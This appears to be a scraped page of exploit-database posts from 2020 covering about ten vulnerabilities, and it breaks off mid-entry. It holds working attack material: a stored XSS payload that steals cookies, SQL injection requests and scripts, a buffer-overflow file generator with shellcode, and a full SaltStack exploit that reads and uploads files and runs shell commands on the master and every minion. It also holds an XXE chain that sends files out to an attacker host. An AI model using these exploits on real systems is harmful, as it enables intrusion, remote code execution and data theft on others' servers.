All posts by ISHACK AI BOT
-
osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting
# Title: osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting
# Author: Mehmet Kelepce / Gais Cyber Security
# Date : 2020-03-24
# Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
# Vendor: http://osticket.com
# Remotely Exploitable: Yes
# Dynamic Coding Language: PHP
# CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)

## This vulnerability was found by examining the source code.

PoC : Ticket SLA Plan Name - HTTP POST REQUEST
##########################################################

POST /upload/scp/slas.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/upload/scp/slas.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Connection: close
Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
Upgrade-Insecure-Requests: 1

submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=

Vulnerable parameter: name
Parameter file: /scp/slas.php

I used the name of the SLA for any ticket.

## Risk : cookie information of the target user is obtained.
-
Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path
# Exploit Title: Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path
# Discovery by: Minh Tuan - SunCSR
# Discovery Date: 2020-05-03
# Vendor Homepage: https://getoutline.org/vi/home
# Software Link : https://raw.githubusercontent.com/Jigsaw-Code/outline-releases/master/client/stable/Outline-Client.exe
# Tested Version: 1.3.3
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363

# Step to discover Unquoted Service Path:

C:\Users\minht>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
OutlineService    OutlineService    C:\Program Files (x86)\Outline\OutlineService.exe

C:\Users\minht>sc qc OutlineService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OutlineService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Outline\OutlineService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OutlineService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
-
addressbook 9.0.0.1 - 'id' SQL Injection
# Title: addressbook 9.0.0.1 - 'id' SQL Injection
# Date: 2020-04-01
# Author: David Velazquez a.k.a. d4sh&r000
# vulnerable application: https://sourceforge.net/projects/php-addressbook/files/latest/download
# vulnerable version: 9.0.0.1
# Description: addressbook 9.0.0.1 time-based blind SQL injection
# Tested On: Ubuntu Server 20.04 LTS
# Platform: PHP
# Type: webapp
# Use:
# addressbook9-SQLi.py
#http://127.0.0.1/photo.php?id=1'

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
import requests


def isVulnerable(URL):
    """Check if the URL is vulnerable to time-based blind SQL injection."""
    # The appended payload makes the database SLEEP(5) only if the injected
    # condition is evaluated, so a response slower than 5 seconds indicates
    # that the id parameter is injectable.
    response = requests.get(URL + '%27%20AND%20(SELECT%207812%20FROM%20(SELECT(SLEEP(5)))MkTv)%20AND%20%27nRZy%27=%27nRZy')
    s = response.elapsed.total_seconds()
    if s > 5:
        sys.stdout.write('[+] Application is vulnerable!!!\n')
    else:
        sys.stdout.write('[+] Application NOT vulnerable\n')


if __name__ == "__main__":
    isVulnerable(sys.argv[1])
-
Frigate 3.36 - Buffer Overflow (SEH)
# Exploit Title: Frigate 3.36 - Buffer Overflow (SEH)
# Exploit Author: Xenofon Vassilakopoulos
# Date: 2020-05-03
# Version: 3.36
# Vendor Homepage: http://www.Frigate3.com/
# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
# Tested on: Windows 7 Professional SP1 x86

# Steps to reproduce :
# 1. generate the test.txt using this exploit
# 2. copy the contents of the test.txt to clipboard
# 3. open Frigate3 then go to Disk -> Find Computer
# 4. paste the contents to computer name
# 5. calculator will execute

import struct

filename = 'test.txt'

junk = "A"*4112
nseh = "\xeb\x1A\x90\x90"
seh = struct.pack('L',0x40171c45)  # pop esi # pop ebx # ret
nop = "\x90"*18
junk2 = "\x71\x71\x90\x90"

#msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python
buf = b""
buf += b"\x89\xe7\xda\xc7\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
buf += b"\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x68\x68\x6d\x52"
buf += b"\x77\x70\x63\x30\x73\x30\x35\x30\x6d\x59\x38\x65\x34"
buf += b"\x71\x69\x50\x70\x64\x4c\x4b\x56\x30\x44\x70\x6e\x6b"
buf += b"\x36\x32\x74\x4c\x6c\x4b\x30\x52\x76\x74\x4e\x6b\x71"
buf += b"\x62\x51\x38\x64\x4f\x78\x37\x42\x6a\x45\x76\x76\x51"
buf += b"\x4b\x4f\x6e\x4c\x47\x4c\x43\x51\x63\x4c\x44\x42\x36"
buf += b"\x4c\x61\x30\x6f\x31\x38\x4f\x56\x6d\x45\x51\x69\x57"
buf += b"\x38\x62\x6c\x32\x63\x62\x33\x67\x4e\x6b\x76\x32\x42"
buf += b"\x30\x4e\x6b\x50\x4a\x75\x6c\x4c\x4b\x42\x6c\x57\x61"
buf += b"\x51\x68\x6a\x43\x73\x78\x63\x31\x6a\x71\x43\x61\x6e"
buf += b"\x6b\x73\x69\x37\x50\x35\x51\x78\x53\x6e\x6b\x42\x69"
buf += b"\x65\x48\x4a\x43\x36\x5a\x51\x59\x4e\x6b\x46\x54\x4c"
buf += b"\x4b\x53\x31\x69\x46\x70\x31\x49\x6f\x4c\x6c\x4f\x31"
buf += b"\x48\x4f\x66\x6d\x45\x51\x4f\x37\x66\x58\x49\x70\x63"
buf += b"\x45\x5a\x56\x36\x63\x73\x4d\x7a\x58\x65\x6b\x63\x4d"
buf += b"\x34\x64\x44\x35\x4a\x44\x63\x68\x4c\x4b\x33\x68\x44"
buf += b"\x64\x66\x61\x38\x53\x52\x46\x4e\x6b\x34\x4c\x50\x4b"
buf += b"\x6e\x6b\x43\x68\x75\x4c\x76\x61\x6e\x33\x4e\x6b\x55"
buf += b"\x54\x6e\x6b\x53\x31\x38\x50\x4f\x79\x43\x74\x37\x54"
buf += b"\x76\x44\x51\x4b\x31\x4b\x53\x51\x36\x39\x50\x5a\x32"
buf += b"\x71\x79\x6f\x79\x70\x43\x6f\x53\x6f\x52\x7a\x4e\x6b"
buf += b"\x67\x62\x48\x6b\x4e\x6d\x43\x6d\x72\x4a\x47\x71\x6e"
buf += b"\x6d\x4d\x55\x4e\x52\x57\x70\x37\x70\x67\x70\x62\x70"
buf += b"\x32\x48\x70\x31\x6e\x6b\x32\x4f\x6c\x47\x39\x6f\x69"
buf += b"\x45\x4d\x6b\x58\x70\x4e\x55\x4d\x72\x51\x46\x30\x68"
buf += b"\x4e\x46\x6f\x65\x4d\x6d\x6d\x4d\x6b\x4f\x39\x45\x45"
buf += b"\x6c\x33\x36\x53\x4c\x37\x7a\x4b\x30\x49\x6b\x49\x70"
buf += b"\x32\x55\x45\x55\x6d\x6b\x33\x77\x44\x53\x42\x52\x50"
buf += b"\x6f\x43\x5a\x67\x70\x33\x63\x4b\x4f\x59\x45\x42\x43"
buf += b"\x65\x31\x52\x4c\x45\x33\x35\x50\x41\x41"

payload = junk + nseh + seh + nop + junk2 + buf

print "[+] Creating file %s" % filename
with open(filename, 'w') as f:
    f.write(payload)
print " File created, wrote %d bytes to file" % len(payload)
-
Fishing Reservation System 7.5 - 'uid' SQL Injection
# Title: Fishing Reservation System 7.5 - 'uid' SQL Injection
# Author: Vulnerability Laboratory
# Date: 2020-05-05
# Vendor: https://fishingreservationsystem.com/index.html
# Software: https://fishingreservationsystem.com/features.htm
# CVE: N/A

Document Title:
===============
Fishing Reservation System - Multiple Remote SQL Injection Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2243

Common Vulnerability Scoring System:
====================================
7.5

Product & Service Introduction:
===============================
(Copy of the Homepage: https://fishingreservationsystem.com/index.html & https://fishingreservationsystem.com/features.htm )

Vulnerability Disclosure Timeline:
==================================
2020-05-04: Public Disclosure (Vulnerability Laboratory)

Technical Details & Description:
================================
Multiple remote SQL injection web vulnerabilities have been discovered in the official Fishing Reservation System application.
The vulnerability allows remote attackers to inject or execute their own SQL commands to compromise the DBMS or file system of the application.

The remote SQL injection web vulnerabilities are located in the pid, type and uid parameters of the admin.php control panel file.
Guest accounts or low privileged user accounts are able to inject and execute their own malicious SQL commands as statements to
compromise the local database and the affected management system. The request method to inject/execute is GET and the attack vector
is client-side. The vulnerability is a classic ORDER BY remote SQL injection web vulnerability. Exploitation of the remote SQL injection
vulnerability requires no user interaction and a low privileged web-application user / guest account. Successful exploitation of the
remote SQL injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] cart.php
[+] calendar.php
[+] admin.php

Vulnerable Parameter(s):
[+] uid
[+] pid
[+] type
[+] m
[+] y
[+] code

Proof of Concept (PoC):
=======================
The remote SQL injection web vulnerability can be exploited by remote attackers with guest access or a low privileged user account and without user interaction.
For security demonstration or to reproduce the remote SQL injection web vulnerability follow the provided information and steps below to continue.

PoC: Example
https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid='[SQL-INJECTION!]--
https://frs.localhost:8080/system/admin.php?page=product/edit&type='[SQL-INJECTION!]--
https://frs.localhost:8080/system/admin.php?page=user/edit&uid='[SQL-INJECTION!]--&PHPSESSID=
-
https://frs.localhost:8080/system/calendar.php?m='[SQL-INJECTION!]--&y=20&PHPSESSID=
https://frs.localhost:8080/system/calendar.php?m=02&y='[SQL-INJECTION!]--&PHPSESSID=
https://frs.localhost:8080/system/modules/cart.php?code='[SQL-INJECTION!]--&PHPSESSID=

PoC: Exploitation (SQL-Injection)
https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
https://frs.localhost:8080/system/admin.php?page=product/edit&type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID=
https://frs.localhost:8080/system/admin.php?page=user/edit&uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
-
https://frs.localhost:8080/system/calendar.php?m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID=
https://frs.localhost:8080/system/calendar.php?m=02&y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
https://frs.localhost:8080/system/modules/cart.php?code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=

PoC: Exploit
<html>
<head>
<title>Fishing Reservation System - SQL INJECTION EXPLOIT (PoC)</title>
</head>
<body>
<iframe src="https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=">
<iframe src="https://frs.localhost:8080/system/admin.php?page=product/edit&type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID=">
<iframe src="https://frs.localhost:8080/system/admin.php?page=user/edit&uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=">
<br>-
<iframe src="https://frs.localhost:8080/system/calendar.php?m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID=">
<iframe src="https://frs.localhost:8080/system/calendar.php?m=02&y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=">
<iframe src="https://frs.localhost:8080/system/modules/cart.php?code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=">
</body>
</html>

Reference(s):
https://frs.localhost:8080/
https://frs.localhost:8080/system/
https://frs.localhost:8080/system/modules/
https://frs.localhost:8080/system/admin.php
https://frs.localhost:8080/system/modules/cart.php

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

--
VULNERABILITY LABORATORY - RESEARCH TEAM
-
Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path
# Exploit Title: Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path
# Discovery by: Nguyen Khang - SunCSR
# Discovery Date: 2020-05-03
# Vendor Homepage: https://www.oracle.com/
# Software Link: https://www.oracle.com/database/technologies/112010-win64soft.html
# Tested Version: 11g release 2
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363

# Step to discover Unquoted Service Path:

C:\Users\cm0s>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
OracleDBConsoleorcl               OracleDBConsoleorcl               C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe       Auto
OracleOraDb11g_home1TNSListener   OracleOraDb11g_home1TNSListener   C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR           Auto
OracleServiceORCL                 OracleServiceORCL                 c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL   Auto

C:\Users\cm0s>sc qc OracleDBConsoleorcl
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OracleDBConsoleorcl
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OracleDBConsoleorcl
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\cm0s>sc qc OracleOraDb11g_home1TNSListener
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OracleOraDb11g_home1TNSListener
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OracleOraDb11g_home1TNSListener
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\cm0s>sc qc OracleServiceORCL
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OracleServiceORCL
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OracleServiceORCL
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
-
Online Scheduling System 1.0 - 'username' SQL Injection
# Exploit Title: Online Scheduling System 1.0 - 'username' SQL Injection
# Date: 2020-05-04
# Exploit Author: Saurav Shukla
# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
---------------------------------------------------------------------------------
# Vulnerable parameter: username

# Injected Request

POST /oss/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost
Connection: close
Referer: http://localhost/oss/Register.php
Cookie: PHPSESSID=091v1e2g6109rrbduk924psea9
Upgrade-Insecure-Requests: 1

username=admin' and sleep(50)--+&password=admin&lgn=Add
-
webERP 4.15.1 - Unauthenticated Backup File Access
# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: http://www.weberp.org
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT
--------------------------------------------------------------------------

About Software:

webERP is a complete web-based accounting and business management system that requires only a web browser and a PDF reader to use.
It has a wide range of features suitable for many businesses, particularly distributed businesses in wholesale, distribution, and manufacturing.

-------------------------------------------------------
PoC: Unauthenticated Backup File Access
---------------------------------------------

1- This file generates a new backup file:
   http://localhost/webERP/BackUpDatabase.php

2- Someone can then download the backup file from:
   -- http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz
-
Saltstack 3000.1 - Remote Code Execution
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# Date: 2020-05-04
# Exploit Author: Jasper Lievisse Adriaanse
# Vendor Homepage: https://www.saltstack.com/
# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# Tested on: Debian 10 with Salt 2019.2.0
# CVE : CVE-2020-11651 and CVE-2020-11652
# Description: Saltstack authentication bypass/remote code execution
#
# Source: https://github.com/jasperla/CVE-2020-11651-poc
# This exploit is based on this checker script:
# https://github.com/rossengeorgiev/salt-security-backports

#!/usr/bin/env python
#
# Exploit for CVE-2020-11651 and CVE-2020-11652
# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)
# This exploit is based on this checker script:
# https://github.com/rossengeorgiev/salt-security-backports

from __future__ import absolute_import, print_function, unicode_literals

import argparse
import datetime
import os
import os.path
import sys
import time

import salt
import salt.version
import salt.transport.client
import salt.exceptions
import salt.utils


def init_minion(master_ip, master_port):
    minion_config = {
        'transport': 'zeromq',
        'pki_dir': '/tmp',
        'id': 'root',
        'log_level': 'debug',
        'master_ip': master_ip,
        'master_port': master_port,
        'auth_timeout': 5,
        'auth_tries': 1,
        'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)
    }

    return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')


# --- check funcs ----

def check_connection(master_ip, master_port, channel):
    print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='')
    sys.stdout.flush()

    # connection check
    try:
        channel.send({'cmd': 'ping'}, timeout=2)
    except salt.exceptions.SaltReqTimeoutError:
        print("OFFLINE")
        sys.exit(1)
    else:
        print("ONLINE")


def check_CVE_2020_11651(channel):
    print("[+] Checking if vulnerable to CVE-2020-11651... ", end='')
    sys.stdout.flush()

    # The original used a finally: block here, which raised NameError when
    # send() failed because rets was never bound; check the reply only after
    # a successful send.
    try:
        rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)
    except:
        print('ERROR')
        return None

    if rets:
        print('YES')
        root_key = rets[2]['root']
        return root_key

    print('NO')
    return None


def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):
    print("[+] Checking if vulnerable to CVE-2020-11652 (read_token)... ", end='')
    sys.stdout.flush()

    # try read file
    msg = {
        'cmd': 'get_token',
        'arg': [],
        'token': top_secret_file_path,
    }

    try:
        rets = channel.send(msg, timeout=3)
    except salt.exceptions.SaltReqTimeoutError:
        print("YES")
    except:
        print("ERROR")
        raise
    else:
        if debug:
            print()
            print(rets)
        print("NO")


def check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):
    print("[+] Checking if vulnerable to CVE-2020-11652 (read)... ", end='')
    sys.stdout.flush()

    # try read file
    msg = {
        'key': root_key,
        'cmd': 'wheel',
        'fun': 'file_roots.read',
        'path': top_secret_file_path,
        'saltenv': 'base',
    }

    try:
        rets = channel.send(msg, timeout=3)
    except salt.exceptions.SaltReqTimeoutError:
        print("TIMEOUT")
    except:
        print("ERROR")
        raise
    else:
        if debug:
            print()
            print(rets)
        if rets['data']['return']:
            print("YES")
        else:
            print("NO")


def check_CVE_2020_11652_write1(debug, channel, root_key):
    print("[+] Checking if vulnerable to CVE-2020-11652 (write1)... ", end='')
    sys.stdout.flush()

    # try write file
    msg = {
        'key': root_key,
        'cmd': 'wheel',
        'fun': 'file_roots.write',
        'path': '../../../../../../../../tmp/salt_CVE_2020_11652',
        'data': 'evil',
        'saltenv': 'base',
    }

    try:
        rets = channel.send(msg, timeout=3)
    except salt.exceptions.SaltReqTimeoutError:
        print("TIMEOUT")
    except:
        print("ERROR")
        raise
    else:
        if debug:
            print()
            print(rets)
        if rets['data']['return'].startswith('Wrote'):
            try:
                os.remove('/tmp/salt_CVE_2020_11652')
            except OSError:
                print("Maybe?")
            else:
                print("YES")
        else:
            print("NO")


def check_CVE_2020_11652_write2(debug, channel, root_key):
    print("[+] Checking if vulnerable to CVE-2020-11652 (write2)... ", end='')
    sys.stdout.flush()

    # try write file
    msg = {
        'key': root_key,
        'cmd': 'wheel',
        'fun': 'config.update_config',
        'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',
        'yaml_contents': 'evil',
        'saltenv': 'base',
    }

    try:
        rets = channel.send(msg, timeout=3)
    except salt.exceptions.SaltReqTimeoutError:
        print("TIMEOUT")
    except:
        print("ERROR")
        raise
    else:
        if debug:
            print()
            print(rets)
        if rets['data']['return'].startswith('Wrote'):
            try:
                os.remove('/tmp/salt_CVE_2020_11652.conf')
            except OSError:
                print("Maybe?")
            else:
                print("YES")
        else:
            print("NO")


def pwn_read_file(channel, root_key, path, master_ip):
    print("[+] Attempting to read {} from {}".format(path, master_ip))
    sys.stdout.flush()

    msg = {
        'key': root_key,
        'cmd': 'wheel',
        'fun': 'file_roots.read',
        'path': path,
        'saltenv': 'base',
    }

    rets = channel.send(msg, timeout=3)
    print(rets['data']['return'][0][path])


def pwn_upload_file(channel, root_key, src, dest, master_ip):
    print("[+] Attempting to upload {} to {} on {}".format(src, dest, master_ip))
    sys.stdout.flush()

    try:
        fh = open(src, 'rb')
        payload = fh.read()
        fh.close()
    except Exception as e:
        print('[-] Failed to read {}: {}'.format(src, e))
        return

    msg = {
        'key': root_key,
        'cmd': 'wheel',
        'fun': 'file_roots.write',
        'saltenv': 'base',
        'data': payload,
        'path': dest,
    }

    rets = channel.send(msg, timeout=3)
    print('[ ] {}'.format(rets['data']['return']))


def pwn_exec(channel, root_key, cmd, master_ip, jid):
    print("[+] Attempting to execute {} on {}".format(cmd, master_ip))
    sys.stdout.flush()

    msg = {
        'key': root_key,
        'cmd': 'runner',
        'fun': 'salt.cmd',
        'saltenv': 'base',
        'user': 'sudo_user',
        'kwarg': {
            'fun': 'cmd.exec_code',
            'lang': 'python',
            'code': "import subprocess;subprocess.call('{}',shell=True)".format(cmd)
        },
        'jid': jid,
    }

    try:
        rets = channel.send(msg, timeout=3)
    except Exception as e:
        print('[-] Failed to submit job')
        return

    if rets.get('jid'):
        print('[+] Successfully scheduled job: {}'.format(rets['jid']))


def pwn_exec_all(channel, root_key, cmd, master_ip, jid):
    print("[+] Attempting to execute '{}' on all minions connected to {}".format(cmd, master_ip))
    sys.stdout.flush()

    msg = {
        'key': root_key,
        'cmd': '_send_pub',
        'fun': 'cmd.run',
        'user': 'root',
        'arg': [
            "/bin/sh -c '{}'".format(cmd)
        ],
        'tgt': '*',
        'tgt_type': 'glob',
        'ret': '',
        'jid': jid
    }

    # As in check_CVE_2020_11651, the result is inspected only after a
    # successful send instead of in a finally: block.
    try:
        rets = channel.send(msg, timeout=3)
    except Exception as e:
        print('[-] Failed to submit job')
        return

    if rets is None:
        print('[+] Successfully submitted job to all minions.')
    else:
        print('[-] Failed to submit job')


def main():
    parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')
    parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')
    parser.add_argument('--port', '-p', dest='master_port', default='4506')
    parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')
    parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')
    parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')
    parser.add_argument('--read', '-r', dest='read_file')
    parser.add_argument('--upload-src', dest='upload_src')
    parser.add_argument('--upload-dest', dest='upload_dest')
    parser.add_argument('--exec', dest='exec', help='Run a command on the master')
    parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')
    args = parser.parse_args()

    print("[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.")
    time.sleep(1)

    # Both src and destination are required for uploads
    if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):
        print('[-] Must provide both --upload-src and --upload-dest')
        sys.exit(1)

    channel = init_minion(args.master_ip, args.master_port)
    check_connection(args.master_ip, args.master_port, channel)
    root_key = check_CVE_2020_11651(channel)

    if root_key:
        print('[*] root key obtained: {}'.format(root_key))
    else:
        print('[-] Failed to find root key...aborting')
        sys.exit(127)

    if args.run_checks:
        # Assuming this check runs on the master itself, create a file with "secret" content
        # and abuse CVE-2020-11652 to read it.
        top_secret_file_path = '/tmp/salt_cve_teta'
        with salt.utils.fopen(top_secret_file_path, 'w') as fd:
            fd.write("top secret")

        # Again, this assumes we're running this check on the master itself
        with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:
            root_key = keyfd.read()

        check_CVE_2020_11652_read_token(args.debug, channel, top_secret_file_path)
        check_CVE_2020_11652_read(args.debug, channel, top_secret_file_path, root_key)
        check_CVE_2020_11652_write1(args.debug, channel, root_key)
        check_CVE_2020_11652_write2(args.debug, channel, root_key)

        os.remove(top_secret_file_path)
        sys.exit(0)

    if args.read_file:
        pwn_read_file(channel, root_key, args.read_file, args.master_ip)

    if args.upload_src:
        if os.path.isabs(args.upload_dest):
            print('[-] Destination path must be relative; aborting')
            sys.exit(1)
        pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)

    jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())

    if args.exec:
        pwn_exec(channel, root_key, args.exec, args.master_ip, jid)

    if args.exec_all:
        print("[!] Lester, is this what you want? Hit ^C to abort.")
        time.sleep(2)
        pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)


if __name__ == '__main__':
    main()
-
BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
# Title: BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
# Author: Daniel Martinez Adan (aDoN90)
# Date: 2020-05-01
# Homepage: https://blogengine.io/
# Software Link: https://blogengine.io/support/download/
# Affected Versions: 3.3
# Vulnerability: XML External Entity (XXE OOB) Injection Vulnerability
# Severity: High
# Status: Fixed
# CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H

Technical Details
--------------------

Url: http://websiteurl-blogengine3.3/syndication.axd
Parameter Name: apml
Parameter Type: GET

Attack Pattern 1 (SSRF HTTP Interaction):

http://websiteurl-blogengine3.3/syndication.axd?apml=http://hav4zt9bu9ihxzvcg59lqfapzg5it7.burpcollaborator.net

Attack Pattern 2 (SSRF to XXE HTTP Interaction):

http://b5baa301-b569-4bbf-afd9-d2eb264fdcbf.gdsdemo.com/blog/syndication.axd?apml=http://attackerip:8000/miau.txt

miau.txt
-----------------------------
<!DOCTYPE foo SYSTEM "http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net">
-----------------------------

Attack Pattern 3 (SSRF to XXE Exfiltration):

miau.txt
-----------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://37.187.112.19:8000/test1.dtd">
%sp;
%param1;
%exfil;
]>
-----------------------------

test1.dtd
-----------------------------
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
